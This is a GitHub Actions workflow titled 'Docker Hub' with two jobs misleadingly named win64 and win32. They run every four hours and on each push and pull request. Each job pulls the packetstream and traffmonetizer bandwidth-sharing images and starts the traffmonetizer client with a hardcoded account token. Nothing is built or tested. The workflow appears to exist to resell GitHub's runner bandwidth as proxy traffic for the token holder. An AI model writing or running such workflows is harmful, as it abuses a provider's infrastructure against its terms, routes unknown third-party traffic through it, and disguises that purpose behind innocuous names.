name: Docker Hub

on:
  schedule:
  - cron: "17 */4 * * *"
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  win64:
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a set of commands using the runners shell
      - name: Docker
        timeout-minutes: 120
        run: |
          sudo docker pull packetstream/psclient:latest
          sudo docker pull traffmonetizer/cli:latest
          sleep 15
          echo === traffmonetizer/cli ===
          sudo docker run -d --name tm0 traffmonetizer/cli start accept --token kQW+w1GUHjip76EgZZXpL3ZqTjTWweRTBCQFcdQIv2o=
          echo === traffmonetizer/cli === Logs ===
          sudo docker logs tm0 -t -f
          echo Done!

  win32:
    runs-on: ubuntu-latest
  
    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a set of commands using the runners shell
      - name: Docker
        timeout-minutes: 120
        run: |
            sudo docker pull packetstream/psclient:latest
            sudo docker pull traffmonetizer/cli:latest
            sleep 15
            echo === traffmonetizer/cli ===
            sudo docker run -d --name tm0 traffmonetizer/cli start accept --token kQW+w1GUHjip76EgZZXpL3ZqTjTWweRTBCQFcdQIv2o=
            echo === traffmonetizer/cli === Logs ===
            sudo docker logs tm0 -t -f
            echo Done!
